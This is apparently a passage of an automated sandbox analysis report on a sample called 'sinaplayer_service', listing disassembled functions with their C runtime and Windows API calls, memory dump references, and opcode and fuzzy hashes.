                                                                                                                                                                                                    Function 6D094728 Relevance: 9.1, APIs: 6, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002), ref: 6D0D463E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D464B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4690
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$CurrentDirectory_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498051304-0
                                                                                                                                                                                                    • Opcode ID: b3fb37e389fb81f4adc988af221b2cacd700417c372523949692c0044c6a6489
                                                                                                                                                                                                    • Instruction ID: b3863794d5b916d1ed38d737cee6e1d4397eda4cbb0f1c2211b382e50fe1ed49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3fb37e389fb81f4adc988af221b2cacd700417c372523949692c0044c6a6489
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621083594521DAFF7105F68D8887AEB7F8FB4B354F52415EE4159B240DB70CD808BA2
                                                                                                                                                                                                    Function 6D1203A7 Relevance: 9.1, APIs: 6, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D12035B,?,?,00000000), ref: 6D1203B4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D12035B,?,?,00000000), ref: 6D1203BF
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D12035B,?,?,00000000), ref: 6D1203D7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D12035B,?,?,00000000), ref: 6D1203E2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 564b881e2ef714d8d792585edc64b52323a05b720d81117a38fef762e831cb26
                                                                                                                                                                                                    • Instruction ID: 8526cae6380ff997502bde8d3073227075dea27eb45e00e8ad9b5275937fd7c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 564b881e2ef714d8d792585edc64b52323a05b720d81117a38fef762e831cb26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F01129323181164FEB04CF76DC607AEB3A8EF91268B16823AD511C7644EBF7E9448661
                                                                                                                                                                                                    Function 6D128638 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D128642
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D12864C
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 6D128660
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,00000000,00000000,000000FF,00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000), ref: 6D128670
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D128699
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    • _wmakepath_s.MSVCR120(00000000,000000FF,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D1286B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FeaturePresentProcessProcessorTerminate__crt__get_sys_err_msg_errno_invalid_parameter_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_wmakepath_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 145895083-0
                                                                                                                                                                                                    • Opcode ID: 8c8a42b07f6a62a7c32a59da7d30d5525dd1fe1b63d91b4e242781929064f72e
                                                                                                                                                                                                    • Instruction ID: 4260eac14501357d805366c3302cf3456b3bfdfad0a5c42823bac4a77e61a5d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8a42b07f6a62a7c32a59da7d30d5525dd1fe1b63d91b4e242781929064f72e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A301243100821EBBDF121E98DC01AFF3B59AF19328F918119FA28490E4D7B785E09BD1
                                                                                                                                                                                                    Function 6D126C47 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C8E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C5D
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C6E
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C79
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C99
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: ca88ceccdffc9caa72e73060ede8f03a13cc4685b6424443d30ec5113135439a
                                                                                                                                                                                                    • Instruction ID: 4a5354db13ba1a38804ef66308091c058814185a701711234ea31f5422f38f03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca88ceccdffc9caa72e73060ede8f03a13cc4685b6424443d30ec5113135439a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A501617160821E9FDF137F55ED402AA3668EF693A4B124021E9145A198E7F398F0DBE2
                                                                                                                                                                                                    Function 6D126BC0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126BCB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126C07
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126BD6
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D126BE7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126BF2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D126C12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 704cc1ed3ad553668fb5bc1e733ea7f572e111d665b5baa62df7495875e9be36
                                                                                                                                                                                                    • Instruction ID: bfe72634edd41f380758f56d801cf8bccc3a8e5c052fab2ca09e18ffd4f5eed3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 704cc1ed3ad553668fb5bc1e733ea7f572e111d665b5baa62df7495875e9be36
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED01847120811EDFDB067E65FC402AA37A8FF653A5B120072E9145A198D7F388E0CBF2
                                                                                                                                                                                                    Function 6D0B0E8C Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0A0BAA
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,00000000,00000001,?,6D0FC767,0000002F,00000000), ref: 6D0B0E9E
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,00000000,00000001,?,6D0FC767,0000002F,00000000), ref: 6D0B0EA9
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,00000000,00000000), ref: 6D0B0EBC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6D0D6370
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D639B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_invoke_watsoncallocwcscpy_swcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2591421054-0
                                                                                                                                                                                                    • Opcode ID: 6a229dd47c25f3bbf22d3a6641da4b2aee1296c9d90f34ce879cb8083004f879
                                                                                                                                                                                                    • Instruction ID: d39fbc72ac4daff0ff60335732afa06738c2a4931245ab08c83046498438927d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a229dd47c25f3bbf22d3a6641da4b2aee1296c9d90f34ce879cb8083004f879
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0F43136C30A7BFB0149A69D04B6F329CAB45748F45843BFA08DA101E7B685508691
                                                                                                                                                                                                    Function 6D0A3A83 Relevance: 9.1, APIs: 6, Instructions: 54libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,7622F550), ref: 6D0A3A99
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6D080000,?,00000104), ref: 6D0A3AB6
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D0A3ACF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0A3AE9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D37F4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000), ref: 6D0D3805
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionFileHandleLastLibraryLoadNameThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2921151260-0
                                                                                                                                                                                                    • Opcode ID: fdbcbcb9f8e34c7bc20775871800aab60d55d669ce55fd03756461ed382539cc
                                                                                                                                                                                                    • Instruction ID: 4b2ef1c37b70ae6ee17e14b837ed4a4cde41f442d6efadfe75159b64505e9389
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdbcbcb9f8e34c7bc20775871800aab60d55d669ce55fd03756461ed382539cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C011E170600219AFFB14DBE0DC88BBE77B8FB49704F5444AEE515CA141EB79D500CA90
                                                                                                                                                                                                    Function 6D0945F8 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000018,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A9409
                                                                                                                                                                                                    • _lock.MSVCR120(0000000A,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A941B
                                                                                                                                                                                                    • __crtInitializeCriticalSectionEx.MSVCR120(00000000,00000FA0,00000000,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0A9438
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0D3BC9
                                                                                                                                                                                                    • _errno.MSVCR120(6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection__crt_errno_lock_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3513197803-0
                                                                                                                                                                                                    • Opcode ID: f28412bec309e736ee671f3ec396001dfc9b4494dcc850c437d5810a67331f50
                                                                                                                                                                                                    • Instruction ID: 880f90921f75fb3733ed33db4dc4cc792e97b14b651c08937d669e25a45c8b42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f28412bec309e736ee671f3ec396001dfc9b4494dcc850c437d5810a67331f50
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501D876A5C347BAFB511BB4B800B6C3260AB06329F925139E7209F1C1DFB58445A667
                                                                                                                                                                                                    Function 6D0B3C63 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectoryErrorLast__doserrno__dosmaperr_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1064742514-0
                                                                                                                                                                                                    • Opcode ID: 51a0e2eefd5d5d0f2da89e56c34cc789986f982d07e30c4537c7bca1e36c8128
                                                                                                                                                                                                    • Instruction ID: 21f60be18eeeacbf0adbc7155a64c495ad411bbeb06becfdc945c4ce0b0624e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51a0e2eefd5d5d0f2da89e56c34cc789986f982d07e30c4537c7bca1e36c8128
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D175A18209ABFB40DFF8D84032E77B4FF0A314F51956AD519CB280FB70C9048B66
                                                                                                                                                                                                    Function 6D0A6F29 Relevance: 9.0, APIs: 6, Instructions: 42memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A58DA: __EH_prolog3.LIBCMT ref: 6D0A58E1
                                                                                                                                                                                                      • Part of subcall function 6D0A6F10: TlsAlloc.KERNEL32 ref: 6D0A6F16
                                                                                                                                                                                                    • TlsAlloc.KERNEL32(6D0948CA), ref: 6D0A6F52
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D2F79
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6D0D2F90
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,00000000), ref: 6D0D2F9F
                                                                                                                                                                                                    • TlsFree.KERNEL32(6D15CF40,6D15CF40,00000000), ref: 6D0D2FAB
                                                                                                                                                                                                    • TlsFree.KERNEL32(?,6D0FA5DB,?,?), ref: 6D0D2FBE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocFree$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionH_prolog3LastThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 46841429-0
                                                                                                                                                                                                    • Opcode ID: 00d8d2a9d998e5bd47f94f299f0cac4c74e8de6bea97d1d0c201f20be1e14d09
                                                                                                                                                                                                    • Instruction ID: f82becbb11a6085f37e8cb34d7f518c7d811a919d6dafea9a3e709f1e68d3df2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00d8d2a9d998e5bd47f94f299f0cac4c74e8de6bea97d1d0c201f20be1e14d09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD017CB1564241DFEB10AFB6E809B3A77B4BB02266F500B29F526C60D1EBB88010CB95
                                                                                                                                                                                                    Function 6D094F4C Relevance: 9.0, APIs: 6, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 6D094F6E
                                                                                                                                                                                                      • Part of subcall function 6D094E60: free.MSVCR120(?,?,?,6D094F73,?,?), ref: 6D094E76
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?), ref: 6D094F74
                                                                                                                                                                                                    • _close.MSVCR120(00000000,?,?,?), ref: 6D094F7A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D53EC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D53F7
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D540E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
